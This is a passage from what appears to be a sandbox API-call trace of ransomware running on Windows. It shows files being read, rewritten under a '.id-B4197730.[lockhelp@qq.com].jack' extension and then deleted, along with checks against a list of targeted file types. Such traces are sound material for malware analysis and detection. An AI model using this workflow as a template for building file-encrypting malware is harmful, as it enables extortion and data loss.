SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0219.559] GetLastError () returned 0x0 [0219.559] ReadFile (in: hFile=0x424, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x127e, lpOverlapped=0x0) returned 1 [0219.645] WriteFile (in: hFile=0x3dc, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x1280, lpOverlapped=0x0) returned 1 [0219.646] ReadFile (in: hFile=0x424, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0219.646] WriteFile (in: hFile=0x3dc, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0219.646] SetEndOfFile (hFile=0x3dc) returned 1 [0219.646] CloseHandle (hObject=0x3dc) returned 1 [0219.647] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.647] SetEndOfFile (hFile=0x424) returned 1 [0219.648] CloseHandle (hObject=0x424) returned 1 [0219.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0219.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.649] lstrlenW (lpString=".doc") returned 4 [0219.649] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.649] lstrlenW (lpString=".docx") returned 5 [0219.649] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.649] lstrlenW (lpString=".pdf") returned 4 [0219.649] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0219.649] lstrlenW (lpString=".xls") returned 4 [0219.649] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.649] lstrlenW (lpString=".xlsx") returned 5 [0219.649] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.649] lstrlenW (lpString=".ppt") returned 4 [0219.649] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.649] lstrlenW (lpString=".zip") returned 4 [0219.649] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.649] lstrlenW (lpString=".rar") returned 4 [0219.649] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.649] lstrlenW (lpString=".bz2") returned 4 [0219.649] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.649] lstrlenW (lpString=".7z") returned 3 [0219.649] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.649] lstrlenW (lpString=".dbf") returned 4 [0219.649] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.650] lstrlenW (lpString=".1cd") returned 4 [0219.650] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.650] lstrlenW (lpString=".jpg") returned 4 [0219.650] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.650] lstrlenW (lpString=".doc") returned 4 [0219.650] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.650] lstrlenW (lpString=".docx") returned 5 [0219.650] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.650] lstrlenW (lpString=".pdf") returned 4 [0219.650] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0219.650] lstrlenW (lpString=".xls") returned 4 [0219.650] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.650] lstrlenW (lpString=".xlsx") returned 5 [0219.650] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.650] lstrlenW (lpString=".ppt") returned 4 [0219.650] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.650] lstrlenW (lpString=".zip") returned 4 [0219.650] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.650] lstrlenW (lpString=".rar") returned 4 [0219.650] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.650] lstrlenW (lpString=".bz2") returned 4 [0219.651] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.651] lstrlenW (lpString=".7z") returned 3 [0219.651] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.651] lstrlenW (lpString=".dbf") returned 4 [0219.651] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.651] lstrlenW (lpString=".1cd") returned 4 [0219.651] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0219.651] lstrlenW (lpString=".jpg") returned 4 [0219.651] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.651] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.651] lstrlenW (lpString="AN00853_.WMF") returned 12 [0219.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0219.653] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=20578) returned 1 [0219.653] CloseHandle (hObject=0x3dc) returned 1 [0219.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf")) returned 0x220 [0219.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0219.654] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.654] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0219.655] GetLastError () returned 0x0 [0219.655] ReadFile (in: hFile=0x3ac, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x5062, lpOverlapped=0x0) returned 1 [0219.729] WriteFile (in: hFile=0x3f4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x5070, lpOverlapped=0x0) returned 1 [0219.730] ReadFile (in: hFile=0x3ac, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0219.730] WriteFile (in: hFile=0x3f4, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0219.730] SetEndOfFile (hFile=0x3f4) returned 1 [0219.730] CloseHandle (hObject=0x3f4) returned 1 [0219.732] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.732] SetEndOfFile (hFile=0x3ac) returned 1 [0219.733] CloseHandle (hObject=0x3ac) returned 1 [0219.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0219.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.734] lstrlenW (lpString=".doc") returned 4 [0219.734] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.734] lstrlenW (lpString=".docx") returned 5 [0219.734] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.734] lstrlenW (lpString=".pdf") returned 4 [0219.734] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0219.734] lstrlenW (lpString=".xls") returned 4 [0219.734] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.734] lstrlenW (lpString=".xlsx") returned 5 [0219.734] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.734] lstrlenW (lpString=".ppt") returned 4 [0219.734] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.734] lstrlenW (lpString=".zip") returned 4 [0219.734] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.734] lstrlenW (lpString=".rar") returned 4 [0219.735] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.735] lstrlenW (lpString=".bz2") returned 4 [0219.735] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.735] lstrlenW (lpString=".7z") returned 3 [0219.735] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.735] lstrlenW (lpString=".dbf") returned 4 [0219.735] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.735] lstrlenW (lpString=".1cd") returned 4 [0219.735] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.735] lstrlenW (lpString=".jpg") returned 4 [0219.735] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.735] lstrlenW (lpString=".doc") returned 4 [0219.735] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.735] lstrlenW (lpString=".docx") returned 5 [0219.735] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.735] lstrlenW (lpString=".pdf") returned 4 [0219.735] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0219.735] lstrlenW (lpString=".xls") returned 4 [0219.735] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.735] lstrlenW (lpString=".xlsx") returned 5 [0219.735] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.735] lstrlenW (lpString=".ppt") returned 4 [0219.736] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.736] lstrlenW (lpString=".zip") returned 4 [0219.736] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.736] lstrlenW (lpString=".rar") returned 4 [0219.736] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.736] lstrlenW (lpString=".bz2") returned 4 [0219.736] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.736] lstrlenW (lpString=".7z") returned 3 [0219.736] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.736] lstrlenW (lpString=".dbf") returned 4 [0219.736] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.736] lstrlenW (lpString=".1cd") returned 4 [0219.736] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0219.736] lstrlenW (lpString=".jpg") returned 4 [0219.736] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.737] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.737] lstrlenW (lpString="AN00914_.WMF") returned 12 [0219.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0219.737] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=10832) returned 1 [0219.737] CloseHandle (hObject=0x3ac) returned 1 [0219.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf")) returned 0x220 [0219.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0219.738] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.738] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0219.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0219.738] GetLastError () returned 0x0 [0219.738] ReadFile (in: hFile=0x3ac, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x2a50, lpOverlapped=0x0) returned 1 [0222.739] WriteFile (hFile=0x3f4, lpBuffer=0x4331020, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0) Thread: id = 22 os_tid = 0xdc0 [0195.730] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3fa1250 [0195.731] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3fb1258 [0195.731] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378a70 [0195.732] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65aa30 [0195.732] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378a88 [0195.732] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x444e020 [0195.735] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378aa0 [0195.735] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378aa0, Size=0x20) returned 0x236baf8 [0195.735] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378aa0 [0195.735] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378aa0, Size=0x20) returned 0x236b8f0 [0195.735] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.735] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.735] Wow64DisableWow64FsRedirection (in: OldValue=0x391ff50 | out: OldValue=0x391ff50*=0x0) returned 1 [0195.735] lstrlenW (lpString="kernel32.dll") returned 12 [0195.735] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236baf8 | out: hHeap=0x5e0000) returned 1 [0195.735] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.735] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b8f0 | out: hHeap=0x5e0000) returned 1 [0195.736] Sleep (dwMilliseconds=0x64) [0195.930] lstrcmpiW (lpString1=".log", lpString2=".jack") returned 1 [0195.930] lstrlenW (lpString="PartnerSetupCompleteResult.log") returned 30 [0195.930] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0196.164] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=40) returned 1 [0196.164] CloseHandle (hObject=0x3e0) returned 1 [0196.164] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 0x20 [0196.164] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.164] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0196.164] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.164] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.164] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0196.165] GetLastError () returned 0x0 [0196.165] ReadFile (in: hFile=0x3e0, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x28, lpOverlapped=0x0) returned 1 [0196.175] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x30, lpOverlapped=0x0) returned 1 [0196.176] ReadFile (in: hFile=0x3e0, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.176] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x110, lpOverlapped=0x0) returned 1 [0196.176] SetEndOfFile (hFile=0x3e4) returned 1 [0196.176] CloseHandle (hObject=0x3e4) returned 1 [0196.177] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.177] SetEndOfFile (hFile=0x3e0) returned 1 [0196.178] CloseHandle (hObject=0x3e0) returned 1 [0196.178] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.178] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 1 [0196.178] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.178] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.178] lstrlenW (lpString=".doc") returned 4 [0196.178] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0196.178] lstrlenW (lpString=".docx") returned 5 [0196.178] lstrcmpiW (lpString1=".docx", lpString2="t.log") returned -1 [0196.178] lstrlenW (lpString=".pdf") returned 4 [0196.179] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0196.179] lstrlenW (lpString=".xls") returned 4 [0196.179] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0196.179] lstrlenW (lpString=".xlsx") returned 5 [0196.179] lstrcmpiW (lpString1=".xlsx", lpString2="t.log") returned -1 [0196.179] lstrlenW (lpString=".ppt") returned 4 [0196.179] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0196.179] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.179] lstrlenW (lpString=".zip") returned 4 [0196.179] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0196.179] lstrlenW (lpString=".rar") returned 4 [0196.179] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0196.179] lstrlenW (lpString=".bz2") returned 4 [0196.179] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0196.179] lstrlenW (lpString=".7z") returned 3 [0196.179] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0196.179] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.179] lstrlenW (lpString=".dbf") returned 4 [0196.179] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0196.179] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.179] lstrlenW (lpString=".1cd") returned 4 [0196.179] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0196.179] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.179] lstrlenW (lpString=".jpg") returned 4 [0196.179] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0196.179] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.179] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 50 [0196.179] lstrlenW (lpString=".doc") returned 4 [0196.179] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0196.179] lstrlenW 